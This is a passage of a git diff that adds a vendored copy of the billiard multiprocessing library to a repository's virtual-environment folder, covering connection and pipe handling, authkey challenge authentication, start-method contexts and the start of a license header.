write-only") + + def _check_writable(self): + if not self._writable: + raise OSError("connection is read-only") + + def _bad_message_length(self): + if self._writable: + self._readable = False + else: + self.close() + raise OSError("bad message length") + + @property + def closed(self): + """True if the connection is closed""" + return self._handle is None + + @property + def readable(self): + """True if the connection is readable""" + return self._readable + + @property + def writable(self): + """True if the connection is writable""" + return self._writable + + def fileno(self): + """File descriptor or handle of the connection""" + self._check_closed() + return self._handle + + def close(self): + """Close the connection""" + if self._handle is not None: + try: + self._close() + finally: + self._handle = None + + def send_bytes(self, buf, offset=0, size=None): + """Send the bytes data from a bytes-like object""" + self._check_closed() + self._check_writable() + m = memoryview(buf) + # HACK for byte-indexing of non-bytewise buffers (e.g. array.array) + if m.itemsize > 1: + m = memoryview(bytes(m)) + n = len(m) + if offset < 0: + raise ValueError("offset is negative") + if n < offset: + raise ValueError("buffer length < offset") + if size is None: + size = n - offset + elif size < 0: + raise ValueError("size is negative") + elif offset + size > n: + raise ValueError("buffer length < offset + size") + self._send_bytes(m[offset:offset + size]) + + def send(self, obj): + """Send a (picklable) object""" + self._check_closed() + self._check_writable() + self._send_bytes(ForkingPickler.dumps(obj)) + + def recv_bytes(self, maxlength=None): + """ + Receive bytes data as a bytes object. + """ + self._check_closed() + self._check_readable() + if maxlength is not None and maxlength < 0: + raise ValueError("negative maxlength") + buf = self._recv_bytes(maxlength) + if buf is None: + self._bad_message_length() + return buf.getvalue() + + def recv_bytes_into(self, buf, offset=0): + """ + Receive bytes data into a writeable bytes-like object. + Return the number of bytes read. 
+ """ + self._check_closed() + self._check_readable() + with memoryview(buf) as m: + # Get bytesize of arbitrary buffer + itemsize = m.itemsize + bytesize = itemsize * len(m) + if offset < 0: + raise ValueError("negative offset") + elif offset > bytesize: + raise ValueError("offset too large") + result = self._recv_bytes() + size = result.tell() + if bytesize < offset + size: + raise BufferTooShort(result.getvalue()) + # Message can fit in dest + result.seek(0) + result.readinto(m[ + offset // itemsize:(offset + size) // itemsize + ]) + return size + + def recv(self): + """Receive a (picklable) object""" + self._check_closed() + self._check_readable() + buf = self._recv_bytes() + return ForkingPickler.loadbuf(buf) + + def poll(self, timeout=0.0): + """Whether there is any input available to be read""" + self._check_closed() + self._check_readable() + return self._poll(timeout) + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_value, exc_tb): + self.close() + + def send_offset(self, buf, offset): + return send_offset(self.fileno(), buf, offset) + + def setblocking(self, blocking): + setblocking(self.fileno(), blocking) + + +if _winapi: + + class PipeConnection(_ConnectionBase): + """ + Connection class based on a Windows named pipe. + Overlapped I/O is used, so the handles must have been created + with FILE_FLAG_OVERLAPPED. + """ + _got_empty_message = False + + def _close(self, _CloseHandle=_winapi.CloseHandle): + _CloseHandle(self._handle) + + def _send_bytes(self, buf): + ov, err = _winapi.WriteFile(self._handle, buf, overlapped=True) + try: + if err == _winapi.ERROR_IO_PENDING: + waitres = _winapi.WaitForMultipleObjects( + + [ov.event], False, INFINITE) + assert waitres == WAIT_OBJECT_0 + except: + ov.cancel() + raise + finally: + nwritten, err = ov.GetOverlappedResult(True) + assert err == 0 + assert nwritten == len(buf) + + def _recv_bytes(self, maxsize=None): + if self._got_empty_message: + self._got_empty_message = False + return io.BytesIO() + else: + bsize = 128 if maxsize is None else min(maxsize, 128) + try: + ov, err = _winapi.ReadFile( + self._handle, bsize, overlapped=True, + ) + try: + if err == _winapi.ERROR_IO_PENDING: + waitres = _winapi.WaitForMultipleObjects( + [ov.event], False, INFINITE) + assert waitres == WAIT_OBJECT_0 + except: + ov.cancel() + raise + finally: + nread, err = ov.GetOverlappedResult(True) + if err == 0: + f = io.BytesIO() + f.write(ov.getbuffer()) + return f + elif err == _winapi.ERROR_MORE_DATA: + return self._get_more_data(ov, maxsize) + except OSError as e: + if e.winerror == _winapi.ERROR_BROKEN_PIPE: + raise EOFError + else: + raise + raise RuntimeError( + "shouldn't get here; expected KeyboardInterrupt") + + def _poll(self, timeout): + if (self._got_empty_message or + _winapi.PeekNamedPipe(self._handle)[0] != 0): + return True + return bool(wait([self], timeout)) + + def _get_more_data(self, ov, maxsize): + buf = ov.getbuffer() + f = io.BytesIO() + f.write(buf) + left = _winapi.PeekNamedPipe(self._handle)[1] + assert left > 0 + if maxsize is not None and len(buf) + left > maxsize: + self._bad_message_length() + ov, err = _winapi.ReadFile(self._handle, left, overlapped=True) + rbytes, err = ov.GetOverlappedResult(True) + assert err == 0 + assert rbytes == left + f.write(ov.getbuffer()) + return f + + +class Connection(_ConnectionBase): + """ + Connection class based on an arbitrary file descriptor (Unix only), or + a socket handle (Windows). 
+ """ + + if _winapi: + def _close(self, _close=_billiard.closesocket): + _close(self._handle) + _write = _billiard.send + _read = _billiard.recv + else: + def _close(self, _close=os.close): + _close(self._handle) + _write = os.write + _read = os.read + + def _send(self, buf, write=_write): + remaining = len(buf) + while True: + try: + n = write(self._handle, buf) + except (OSError, IOError, socket.error) as exc: + if getattr(exc, 'errno', None) != errno.EINTR: + raise + else: + remaining -= n + if remaining == 0: + break + buf = buf[n:] + + def _recv(self, size, read=_read): + buf = io.BytesIO() + handle = self._handle + remaining = size + while remaining > 0: + try: + chunk = read(handle, remaining) + except (OSError, IOError, socket.error) as exc: + if getattr(exc, 'errno', None) != errno.EINTR: + raise + else: + n = len(chunk) + if n == 0: + if remaining == size: + raise EOFError + else: + raise OSError("got end of file during message") + buf.write(chunk) + remaining -= n + return buf + + def _send_bytes(self, buf, memoryview=memoryview): + n = len(buf) + # For wire compatibility with 3.2 and lower + header = struct.pack("!i", n) + if n > 16384: + # The payload is large so Nagle's algorithm won't be triggered + # and we'd better avoid the cost of concatenation. + self._send(header) + self._send(buf) + else: + # Issue #20540: concatenate before sending, to avoid delays due + # to Nagle's algorithm on a TCP socket. + # Also note we want to avoid sending a 0-length buffer separately, + # to avoid "broken pipe" errors if the other end closed the pipe. + if isinstance(buf, memoryview): + buf = buf.tobytes() + self._send(header + buf) + + def _recv_bytes(self, maxsize=None): + buf = self._recv(4) + size, = struct.unpack("!i", buf.getvalue()) + if maxsize is not None and size > maxsize: + return None + return self._recv(size) + + def _poll(self, timeout): + r = wait([self], timeout) + return bool(r) + + +# +# Public functions +# + +class Listener: + ''' + Returns a listener object. + + This is a wrapper for a bound socket which is 'listening' for + connections, or for a Windows named pipe. + ''' + def __init__(self, address=None, family=None, backlog=1, authkey=None): + family = (family or + (address and address_type(address)) or default_family) + address = address or arbitrary_address(family) + + _validate_family(family) + if family == 'AF_PIPE': + self._listener = PipeListener(address, backlog) + else: + self._listener = SocketListener(address, family, backlog) + + if authkey is not None and not isinstance(authkey, bytes): + raise TypeError('authkey should be a byte string') + + self._authkey = authkey + + def accept(self): + ''' + Accept a connection on the bound socket or named pipe of `self`. + + Returns a `Connection` object. + ''' + if self._listener is None: + raise OSError('listener is closed') + c = self._listener.accept() + if self._authkey: + deliver_challenge(c, self._authkey) + answer_challenge(c, self._authkey) + return c + + def close(self): + ''' + Close the bound socket or named pipe of `self`. 
+ ''' + listener = self._listener + if listener is not None: + self._listener = None + listener.close() + + address = property(lambda self: self._listener._address) + last_accepted = property(lambda self: self._listener._last_accepted) + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_value, exc_tb): + self.close() + + +def Client(address, family=None, authkey=None): + ''' + Returns a connection to the address of a `Listener` + ''' + family = family or address_type(address) + _validate_family(family) + if family == 'AF_PIPE': + c = PipeClient(address) + else: + c = SocketClient(address) + + if authkey is not None and not isinstance(authkey, bytes): + raise TypeError('authkey should be a byte string') + + if authkey is not None: + answer_challenge(c, authkey) + deliver_challenge(c, authkey) + + return c + + +def detach(sock): + if hasattr(sock, 'detach'): + return sock.detach() + # older socket lib does not have detach. We'll keep a reference around + # so that it does not get garbage collected. + return _SocketContainer(sock) + + +if sys.platform != 'win32': + + def Pipe(duplex=True, rnonblock=False, wnonblock=False): + ''' + Returns pair of connection objects at either end of a pipe + ''' + if duplex: + s1, s2 = socket.socketpair() + s1.setblocking(not rnonblock) + s2.setblocking(not wnonblock) + c1 = Connection(detach(s1)) + c2 = Connection(detach(s2)) + else: + fd1, fd2 = os.pipe() + if rnonblock: + setblocking(fd1, 0) + if wnonblock: + setblocking(fd2, 0) + c1 = Connection(fd1, writable=False) + c2 = Connection(fd2, readable=False) + + return c1, c2 + +else: + + def Pipe(duplex=True, rnonblock=False, wnonblock=False): + ''' + Returns pair of connection objects at either end of a pipe + ''' + assert not rnonblock, 'rnonblock not supported on windows' + assert not wnonblock, 'wnonblock not supported on windows' + address = arbitrary_address('AF_PIPE') + if duplex: + openmode = _winapi.PIPE_ACCESS_DUPLEX + access = _winapi.GENERIC_READ | _winapi.GENERIC_WRITE + obsize, ibsize = BUFSIZE, BUFSIZE + else: + openmode = _winapi.PIPE_ACCESS_INBOUND + access = _winapi.GENERIC_WRITE + obsize, ibsize = 0, BUFSIZE + + h1 = _winapi.CreateNamedPipe( + address, openmode | _winapi.FILE_FLAG_OVERLAPPED | + _winapi.FILE_FLAG_FIRST_PIPE_INSTANCE, + _winapi.PIPE_TYPE_MESSAGE | _winapi.PIPE_READMODE_MESSAGE | + _winapi.PIPE_WAIT, + 1, obsize, ibsize, _winapi.NMPWAIT_WAIT_FOREVER, + # default security descriptor: the handle cannot be inherited + _winapi.NULL + ) + h2 = _winapi.CreateFile( + address, access, 0, _winapi.NULL, _winapi.OPEN_EXISTING, + _winapi.FILE_FLAG_OVERLAPPED, _winapi.NULL + ) + _winapi.SetNamedPipeHandleState( + h2, _winapi.PIPE_READMODE_MESSAGE, None, None + ) + + overlapped = _winapi.ConnectNamedPipe(h1, overlapped=True) + _, err = overlapped.GetOverlappedResult(True) + assert err == 0 + + c1 = PipeConnection(h1, writable=duplex) + c2 = PipeConnection(h2, readable=duplex) + + return c1, c2 + +# +# Definitions for connections based on sockets +# + + +class SocketListener: + ''' + Representation of a socket which is bound to an address and listening + ''' + def __init__(self, address, family, backlog=1): + self._socket = socket.socket(getattr(socket, family)) + try: + # SO_REUSEADDR has different semantics on Windows (issue #2550). 
+ if os.name == 'posix': + self._socket.setsockopt(socket.SOL_SOCKET, + socket.SO_REUSEADDR, 1) + self._socket.setblocking(True) + self._socket.bind(address) + self._socket.listen(backlog) + self._address = self._socket.getsockname() + except OSError: + self._socket.close() + raise + self._family = family + self._last_accepted = None + + if family == 'AF_UNIX': + self._unlink = util.Finalize( + self, os.unlink, args=(address,), exitpriority=0 + ) + else: + self._unlink = None + + def accept(self): + while True: + try: + s, self._last_accepted = self._socket.accept() + except (OSError, IOError, socket.error) as exc: + if getattr(exc, 'errno', None) != errno.EINTR: + raise + else: + break + s.setblocking(True) + return Connection(detach(s)) + + def close(self): + try: + self._socket.close() + finally: + unlink = self._unlink + if unlink is not None: + self._unlink = None + unlink() + + +def SocketClient(address): + ''' + Return a connection object connected to the socket given by `address` + ''' + family = address_type(address) + s = socket.socket(getattr(socket, family)) + s.setblocking(True) + s.connect(address) + return Connection(detach(s)) + +# +# Definitions for connections based on named pipes +# + +if sys.platform == 'win32': + + class PipeListener: + ''' + Representation of a named pipe + ''' + def __init__(self, address, backlog=None): + self._address = address + self._handle_queue = [self._new_handle(first=True)] + + self._last_accepted = None + util.sub_debug('listener created with address=%r', self._address) + self.close = util.Finalize( + self, PipeListener._finalize_pipe_listener, + args=(self._handle_queue, self._address), exitpriority=0 + ) + + def _new_handle(self, first=False): + flags = _winapi.PIPE_ACCESS_DUPLEX | _winapi.FILE_FLAG_OVERLAPPED + if first: + flags |= _winapi.FILE_FLAG_FIRST_PIPE_INSTANCE + return _winapi.CreateNamedPipe( + self._address, flags, + _winapi.PIPE_TYPE_MESSAGE | _winapi.PIPE_READMODE_MESSAGE | + _winapi.PIPE_WAIT, + _winapi.PIPE_UNLIMITED_INSTANCES, BUFSIZE, BUFSIZE, + _winapi.NMPWAIT_WAIT_FOREVER, _winapi.NULL + ) + + def accept(self): + self._handle_queue.append(self._new_handle()) + handle = self._handle_queue.pop(0) + try: + ov = _winapi.ConnectNamedPipe(handle, overlapped=True) + except OSError as e: + if e.winerror != _winapi.ERROR_NO_DATA: + raise + # ERROR_NO_DATA can occur if a client has already connected, + # written data and then disconnected -- see Issue 14725. 
+ else: + try: + _winapi.WaitForMultipleObjects( + [ov.event], False, INFINITE) + except: + ov.cancel() + _winapi.CloseHandle(handle) + raise + finally: + _, err = ov.GetOverlappedResult(True) + assert err == 0 + return PipeConnection(handle) + + @staticmethod + def _finalize_pipe_listener(queue, address): + util.sub_debug('closing listener with address=%r', address) + for handle in queue: + _winapi.CloseHandle(handle) + + def PipeClient(address, _ignore=(_winapi.ERROR_SEM_TIMEOUT, + _winapi.ERROR_PIPE_BUSY)): + ''' + Return a connection object connected to the pipe given by `address` + ''' + t = _init_timeout() + while 1: + try: + _winapi.WaitNamedPipe(address, 1000) + h = _winapi.CreateFile( + address, _winapi.GENERIC_READ | _winapi.GENERIC_WRITE, + 0, _winapi.NULL, _winapi.OPEN_EXISTING, + _winapi.FILE_FLAG_OVERLAPPED, _winapi.NULL + ) + except OSError as e: + if e.winerror not in _ignore or _check_timeout(t): + raise + else: + break + else: + raise + + _winapi.SetNamedPipeHandleState( + h, _winapi.PIPE_READMODE_MESSAGE, None, None + ) + return PipeConnection(h) + +# +# Authentication stuff +# + +MESSAGE_LENGTH = 20 + +CHALLENGE = b'#CHALLENGE#' +WELCOME = b'#WELCOME#' +FAILURE = b'#FAILURE#' + + +def deliver_challenge(connection, authkey): + import hmac + assert isinstance(authkey, bytes) + message = os.urandom(MESSAGE_LENGTH) + connection.send_bytes(CHALLENGE + message) + digest = hmac.new(authkey, message, 'md5').digest() + response = connection.recv_bytes(256) # reject large message + if response == digest: + connection.send_bytes(WELCOME) + else: + connection.send_bytes(FAILURE) + raise AuthenticationError('digest received was wrong') + + +def answer_challenge(connection, authkey): + import hmac + assert isinstance(authkey, bytes) + message = connection.recv_bytes(256) # reject large message + assert message[:len(CHALLENGE)] == CHALLENGE, 'message = %r' % message + message = message[len(CHALLENGE):] + digest = hmac.new(authkey, message, 'md5').digest() + connection.send_bytes(digest) + response = connection.recv_bytes(256) # reject large message + if response != WELCOME: + raise AuthenticationError('digest sent was rejected') + +# +# Support for using xmlrpclib for serialization +# + + +class ConnectionWrapper: + + def __init__(self, conn, dumps, loads): + self._conn = conn + self._dumps = dumps + self._loads = loads + for attr in ('fileno', 'close', 'poll', 'recv_bytes', 'send_bytes'): + obj = getattr(conn, attr) + setattr(self, attr, obj) + + def send(self, obj): + s = self._dumps(obj) + self._conn.send_bytes(s) + + def recv(self): + s = self._conn.recv_bytes() + return self._loads(s) + + +def _xml_dumps(obj): + o = xmlrpclib.dumps((obj, ), None, None, None, 1) # noqa + return o.encode('utf-8') + + +def _xml_loads(s): + (obj,), method = xmlrpclib.loads(s.decode('utf-8')) # noqa + return obj + + +class XmlListener(Listener): + + def accept(self): + global xmlrpclib + import xmlrpc.client as xmlrpclib # noqa + obj = Listener.accept(self) + return ConnectionWrapper(obj, _xml_dumps, _xml_loads) + + +def XmlClient(*args, **kwds): + global xmlrpclib + import xmlrpc.client as xmlrpclib # noqa + return ConnectionWrapper(Client(*args, **kwds), _xml_dumps, _xml_loads) + +# +# Wait +# + +if sys.platform == 'win32': + + def _exhaustive_wait(handles, timeout): + # Return ALL handles which are currently signaled. (Only + # returning the first signaled might create starvation issues.) 
+ L = list(handles) + ready = [] + while L: + res = _winapi.WaitForMultipleObjects(L, False, timeout) + if res == WAIT_TIMEOUT: + break + elif WAIT_OBJECT_0 <= res < WAIT_OBJECT_0 + len(L): + res -= WAIT_OBJECT_0 + elif WAIT_ABANDONED_0 <= res < WAIT_ABANDONED_0 + len(L): + res -= WAIT_ABANDONED_0 + else: + raise RuntimeError('Should not get here') + ready.append(L[res]) + L = L[res + 1:] + timeout = 0 + return ready + + _ready_errors = {_winapi.ERROR_BROKEN_PIPE, _winapi.ERROR_NETNAME_DELETED} + + def wait(object_list, timeout=None): + ''' + Wait till an object in object_list is ready/readable. + + Returns list of those objects in object_list which are ready/readable. + ''' + if timeout is None: + timeout = INFINITE + elif timeout < 0: + timeout = 0 + else: + timeout = int(timeout * 1000 + 0.5) + + object_list = list(object_list) + waithandle_to_obj = {} + ov_list = [] + ready_objects = set() + ready_handles = set() + + try: + for o in object_list: + try: + fileno = getattr(o, 'fileno') + except AttributeError: + waithandle_to_obj[o.__index__()] = o + else: + # start an overlapped read of length zero + try: + ov, err = _winapi.ReadFile(fileno(), 0, True) + except OSError as e: + err = e.winerror + if err not in _ready_errors: + raise + if err == _winapi.ERROR_IO_PENDING: + ov_list.append(ov) + waithandle_to_obj[ov.event] = o + else: + # If o.fileno() is an overlapped pipe handle and + # err == 0 then there is a zero length message + # in the pipe, but it HAS NOT been consumed. + ready_objects.add(o) + timeout = 0 + + ready_handles = _exhaustive_wait(waithandle_to_obj.keys(), timeout) + finally: + # request that overlapped reads stop + for ov in ov_list: + ov.cancel() + + # wait for all overlapped reads to stop + for ov in ov_list: + try: + _, err = ov.GetOverlappedResult(True) + except OSError as e: + err = e.winerror + if err not in _ready_errors: + raise + if err != _winapi.ERROR_OPERATION_ABORTED: + o = waithandle_to_obj[ov.event] + ready_objects.add(o) + if err == 0: + # If o.fileno() is an overlapped pipe handle then + # a zero length message HAS been consumed. + if hasattr(o, '_got_empty_message'): + o._got_empty_message = True + + ready_objects.update(waithandle_to_obj[h] for h in ready_handles) + return [p for p in object_list if p in ready_objects] + +else: + + if hasattr(select, 'poll'): + def _poll(fds, timeout): + if timeout is not None: + timeout = int(timeout * 1000) # timeout is in milliseconds + fd_map = {} + pollster = select.poll() + for fd in fds: + pollster.register(fd, select.POLLIN) + if hasattr(fd, 'fileno'): + fd_map[fd.fileno()] = fd + else: + fd_map[fd] = fd + ls = [] + for fd, event in pollster.poll(timeout): + if event & select.POLLNVAL: + raise ValueError('invalid file descriptor %i' % fd) + ls.append(fd_map[fd]) + return ls + else: + def _poll(fds, timeout): # noqa + return select.select(fds, [], [], timeout)[0] + + def wait(object_list, timeout=None): # noqa + ''' + Wait till an object in object_list is ready/readable. + + Returns list of those objects in object_list which are ready/readable. 
+ ''' + if timeout is not None: + if timeout <= 0: + return _poll(object_list, 0) + else: + deadline = monotonic() + timeout + while True: + try: + return _poll(object_list, timeout) + except (OSError, IOError, socket.error) as e: + if e.errno != errno.EINTR: + raise + if timeout is not None: + timeout = deadline - monotonic() + +# +# Make connection and socket objects shareable if possible +# + +if sys.platform == 'win32': + def reduce_connection(conn): + handle = conn.fileno() + with socket.fromfd(handle, socket.AF_INET, socket.SOCK_STREAM) as s: + from . import resource_sharer + ds = resource_sharer.DupSocket(s) + return rebuild_connection, (ds, conn.readable, conn.writable) + + def rebuild_connection(ds, readable, writable): + sock = ds.detach() + return Connection(detach(sock), readable, writable) + reduction.register(Connection, reduce_connection) + + def reduce_pipe_connection(conn): + access = ((_winapi.FILE_GENERIC_READ if conn.readable else 0) | + (_winapi.FILE_GENERIC_WRITE if conn.writable else 0)) + dh = reduction.DupHandle(conn.fileno(), access) + return rebuild_pipe_connection, (dh, conn.readable, conn.writable) + + def rebuild_pipe_connection(dh, readable, writable): + return PipeConnection(detach(dh), readable, writable) + reduction.register(PipeConnection, reduce_pipe_connection) + +else: + def reduce_connection(conn): + df = reduction.DupFd(conn.fileno()) + return rebuild_connection, (df, conn.readable, conn.writable) + + def rebuild_connection(df, readable, writable): + return Connection(detach(df), readable, writable) + reduction.register(Connection, reduce_connection) diff --git a/env/Lib/site-packages/billiard/context.py b/env/Lib/site-packages/billiard/context.py new file mode 100644 index 00000000..5bbc8352 --- /dev/null +++ b/env/Lib/site-packages/billiard/context.py @@ -0,0 +1,420 @@ +import os +import sys +import threading +import warnings + +from . 
import process + +__all__ = [] # things are copied from here to __init__.py + + +W_NO_EXECV = """\ +force_execv is not supported as the billiard C extension \ +is not installed\ +""" + + +# +# Exceptions +# + +from .exceptions import ( # noqa + ProcessError, + BufferTooShort, + TimeoutError, + AuthenticationError, + TimeLimitExceeded, + SoftTimeLimitExceeded, + WorkerLostError, +) + + +# +# Base type for contexts +# + +class BaseContext: + + ProcessError = ProcessError + BufferTooShort = BufferTooShort + TimeoutError = TimeoutError + AuthenticationError = AuthenticationError + TimeLimitExceeded = TimeLimitExceeded + SoftTimeLimitExceeded = SoftTimeLimitExceeded + WorkerLostError = WorkerLostError + + current_process = staticmethod(process.current_process) + active_children = staticmethod(process.active_children) + + if hasattr(os, 'cpu_count'): + def cpu_count(self): + '''Returns the number of CPUs in the system''' + num = os.cpu_count() + if num is None: + raise NotImplementedError('cannot determine number of cpus') + else: + return num + else: + def cpu_count(self): # noqa + if sys.platform == 'win32': + try: + num = int(os.environ['NUMBER_OF_PROCESSORS']) + except (ValueError, KeyError): + num = 0 + elif 'bsd' in sys.platform or sys.platform == 'darwin': + comm = '/sbin/sysctl -n hw.ncpu' + if sys.platform == 'darwin': + comm = '/usr' + comm + try: + with os.popen(comm) as p: + num = int(p.read()) + except ValueError: + num = 0 + else: + try: + num = os.sysconf('SC_NPROCESSORS_ONLN') + except (ValueError, OSError, AttributeError): + num = 0 + + if num >= 1: + return num + else: + raise NotImplementedError('cannot determine number of cpus') + + def Manager(self): + '''Returns a manager associated with a running server process + + The managers methods such as `Lock()`, `Condition()` and `Queue()` + can be used to create shared objects. 
+ ''' + from .managers import SyncManager + m = SyncManager(ctx=self.get_context()) + m.start() + return m + + def Pipe(self, duplex=True, rnonblock=False, wnonblock=False): + '''Returns two connection object connected by a pipe''' + from .connection import Pipe + return Pipe(duplex, rnonblock, wnonblock) + + def Lock(self): + '''Returns a non-recursive lock object''' + from .synchronize import Lock + return Lock(ctx=self.get_context()) + + def RLock(self): + '''Returns a recursive lock object''' + from .synchronize import RLock + return RLock(ctx=self.get_context()) + + def Condition(self, lock=None): + '''Returns a condition object''' + from .synchronize import Condition + return Condition(lock, ctx=self.get_context()) + + def Semaphore(self, value=1): + '''Returns a semaphore object''' + from .synchronize import Semaphore + return Semaphore(value, ctx=self.get_context()) + + def BoundedSemaphore(self, value=1): + '''Returns a bounded semaphore object''' + from .synchronize import BoundedSemaphore + return BoundedSemaphore(value, ctx=self.get_context()) + + def Event(self): + '''Returns an event object''' + from .synchronize import Event + return Event(ctx=self.get_context()) + + def Barrier(self, parties, action=None, timeout=None): + '''Returns a barrier object''' + from .synchronize import Barrier + return Barrier(parties, action, timeout, ctx=self.get_context()) + + def Queue(self, maxsize=0): + '''Returns a queue object''' + from .queues import Queue + return Queue(maxsize, ctx=self.get_context()) + + def JoinableQueue(self, maxsize=0): + '''Returns a queue object''' + from .queues import JoinableQueue + return JoinableQueue(maxsize, ctx=self.get_context()) + + def SimpleQueue(self): + '''Returns a queue object''' + from .queues import SimpleQueue + return SimpleQueue(ctx=self.get_context()) + + def Pool(self, processes=None, initializer=None, initargs=(), + maxtasksperchild=None, timeout=None, soft_timeout=None, + lost_worker_timeout=None, max_restarts=None, + max_restart_freq=1, on_process_up=None, on_process_down=None, + on_timeout_set=None, on_timeout_cancel=None, threads=True, + semaphore=None, putlocks=False, allow_restart=False): + '''Returns a process pool object''' + from .pool import Pool + return Pool(processes, initializer, initargs, maxtasksperchild, + timeout, soft_timeout, lost_worker_timeout, + max_restarts, max_restart_freq, on_process_up, + on_process_down, on_timeout_set, on_timeout_cancel, + threads, semaphore, putlocks, allow_restart, + context=self.get_context()) + + def RawValue(self, typecode_or_type, *args): + '''Returns a shared object''' + from .sharedctypes import RawValue + return RawValue(typecode_or_type, *args) + + def RawArray(self, typecode_or_type, size_or_initializer): + '''Returns a shared array''' + from .sharedctypes import RawArray + return RawArray(typecode_or_type, size_or_initializer) + + def Value(self, typecode_or_type, *args, **kwargs): + '''Returns a synchronized shared object''' + from .sharedctypes import Value + lock = kwargs.get('lock', True) + return Value(typecode_or_type, *args, lock=lock, + ctx=self.get_context()) + + def Array(self, typecode_or_type, size_or_initializer, *args, **kwargs): + '''Returns a synchronized shared array''' + from .sharedctypes import Array + lock = kwargs.get('lock', True) + return Array(typecode_or_type, size_or_initializer, lock=lock, + ctx=self.get_context()) + + def freeze_support(self): + '''Check whether this is a fake forked process in a frozen executable. 
+ If so then run code specified by commandline and exit. + ''' + if sys.platform == 'win32' and getattr(sys, 'frozen', False): + from .spawn import freeze_support + freeze_support() + + def get_logger(self): + '''Return package logger -- if it does not already exist then + it is created. + ''' + from .util import get_logger + return get_logger() + + def log_to_stderr(self, level=None): + '''Turn on logging and add a handler which prints to stderr''' + from .util import log_to_stderr + return log_to_stderr(level) + + def allow_connection_pickling(self): + '''Install support for sending connections and sockets + between processes + ''' + # This is undocumented. In previous versions of multiprocessing + # its only effect was to make socket objects inheritable on Windows. + from . import connection # noqa + + def set_executable(self, executable): + '''Sets the path to a python.exe or pythonw.exe binary used to run + child processes instead of sys.executable when using the 'spawn' + start method. Useful for people embedding Python. + ''' + from .spawn import set_executable + set_executable(executable) + + def set_forkserver_preload(self, module_names): + '''Set list of module names to try to load in forkserver process. + This is really just a hint. + ''' + from .forkserver import set_forkserver_preload + set_forkserver_preload(module_names) + + def get_context(self, method=None): + if method is None: + return self + try: + ctx = _concrete_contexts[method] + except KeyError: + raise ValueError('cannot find context for %r' % method) + ctx._check_available() + return ctx + + def get_start_method(self, allow_none=False): + return self._name + + def set_start_method(self, method=None): + raise ValueError('cannot set start method of concrete context') + + def forking_is_enabled(self): + # XXX for compatibility with billiard <3.4 + return (self.get_start_method() or 'fork') == 'fork' + + def forking_enable(self, value): + # XXX for compatibility with billiard <3.4 + if not value: + from ._ext import supports_exec + if supports_exec: + self.set_start_method('spawn', force=True) + else: + warnings.warn(RuntimeWarning(W_NO_EXECV)) + + def _check_available(self): + pass + +# +# Type of default context -- underlying context can be set at most once +# + + +class Process(process.BaseProcess): + _start_method = None + + @staticmethod + def _Popen(process_obj): + return _default_context.get_context().Process._Popen(process_obj) + + +class DefaultContext(BaseContext): + Process = Process + + def __init__(self, context): + self._default_context = context + self._actual_context = None + + def get_context(self, method=None): + if method is None: + if self._actual_context is None: + self._actual_context = self._default_context + return self._actual_context + else: + return super(DefaultContext, self).get_context(method) + + def set_start_method(self, method, force=False): + if self._actual_context is not None and not force: + raise RuntimeError('context has already been set') + if method is None and force: + self._actual_context = None + return + self._actual_context = self.get_context(method) + + def get_start_method(self, allow_none=False): + if self._actual_context is None: + if allow_none: + return None + self._actual_context = self._default_context + return self._actual_context._name + + def get_all_start_methods(self): + if sys.platform == 'win32': + return ['spawn'] + else: + from . 
import reduction + if reduction.HAVE_SEND_HANDLE: + return ['fork', 'spawn', 'forkserver'] + else: + return ['fork', 'spawn'] + +DefaultContext.__all__ = list(x for x in dir(DefaultContext) if x[0] != '_') + +# +# Context types for fixed start method +# + +if sys.platform != 'win32': + + class ForkProcess(process.BaseProcess): + _start_method = 'fork' + + @staticmethod + def _Popen(process_obj): + from .popen_fork import Popen + return Popen(process_obj) + + class SpawnProcess(process.BaseProcess): + _start_method = 'spawn' + + @staticmethod + def _Popen(process_obj): + from .popen_spawn_posix import Popen + return Popen(process_obj) + + class ForkServerProcess(process.BaseProcess): + _start_method = 'forkserver' + + @staticmethod + def _Popen(process_obj): + from .popen_forkserver import Popen + return Popen(process_obj) + + class ForkContext(BaseContext): + _name = 'fork' + Process = ForkProcess + + class SpawnContext(BaseContext): + _name = 'spawn' + Process = SpawnProcess + + class ForkServerContext(BaseContext): + _name = 'forkserver' + Process = ForkServerProcess + + def _check_available(self): + from . import reduction + if not reduction.HAVE_SEND_HANDLE: + raise ValueError('forkserver start method not available') + + _concrete_contexts = { + 'fork': ForkContext(), + 'spawn': SpawnContext(), + 'forkserver': ForkServerContext(), + } + _default_context = DefaultContext(_concrete_contexts['fork']) + +else: + + class SpawnProcess(process.BaseProcess): + _start_method = 'spawn' + + @staticmethod + def _Popen(process_obj): + from .popen_spawn_win32 import Popen + return Popen(process_obj) + + class SpawnContext(BaseContext): + _name = 'spawn' + Process = SpawnProcess + + _concrete_contexts = { + 'spawn': SpawnContext(), + } + _default_context = DefaultContext(_concrete_contexts['spawn']) + +# +# Force the start method +# + + +def _force_start_method(method): + _default_context._actual_context = _concrete_contexts[method] + +# +# Check that the current thread is spawning a child process +# + +_tls = threading.local() + + +def get_spawning_popen(): + return getattr(_tls, 'spawning_popen', None) + + +def set_spawning_popen(popen): + _tls.spawning_popen = popen + + +def assert_spawning(obj): + if get_spawning_popen() is None: + raise RuntimeError( + '%s objects should only be shared between processes' + ' through inheritance' % type(obj).__name__ + ) diff --git a/env/Lib/site-packages/billiard/dummy/__init__.py b/env/Lib/site-packages/billiard/dummy/__init__.py new file mode 100644 index 00000000..1ba3e90d --- /dev/null +++ b/env/Lib/site-packages/billiard/dummy/__init__.py @@ -0,0 +1,166 @@ +# +# Support for the API of the multiprocessing package using threads +# +# multiprocessing/dummy/__init__.py +# +# Copyright (c) 2006-2008, R Oudkerk +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions +# are met: +# +# 1. Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# 2. Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# 3. Neither the name of author nor the names of any contributors may be +# used to endorse or promote products derived from this software +# without specific prior written permission. 
